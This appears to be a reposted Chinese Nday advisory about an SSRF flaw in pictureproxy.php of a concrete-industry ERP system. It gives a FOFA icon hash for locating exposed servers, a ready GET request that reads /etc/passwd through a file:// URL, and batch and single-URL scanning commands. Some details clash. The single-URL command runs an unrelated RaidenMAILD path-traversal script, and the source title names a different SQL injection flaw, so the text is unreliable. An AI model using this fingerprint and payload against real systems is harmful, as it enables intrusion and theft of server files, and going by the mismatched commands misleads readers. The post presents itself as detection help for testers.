fofa
icon_hash="-949312335"
一、漏洞简述
商混ERP系统是一种专为商混行业设计的企业资源计划软件,旨在提升生产管理、物流调度和财务控制等方面的效率。该系统集成了订单管理、生产计划、库存管理和成本控制等功能,帮助企业优化资源配置和业务流程。通过实时数据分析和报表生成,商混ERP系统支持决策者及时掌握运营状况,提升整体竞争力,适合各类商混企业使用。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。
二、漏洞检测poc
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
三、漏洞检测脚本
安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:
https://github.com/ATonysan/poc-exp/blob/main/ChatGPT_pictureproxy_SSRF.py
批量检测:
python ChatGPT_pictureproxy_SSRF.py -f url.txt
单个url检测漏洞:
python RaidenMAILD_CVE-2024-32399_Path_Traversal.py -u url
四、修复
官方已更新补丁,请升级至最新版本。
原文始发于微信公众号(苏诺木安全团队):【Nday】某混ERP系统 TaskCarToQueue SQL注入漏洞【附poc】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论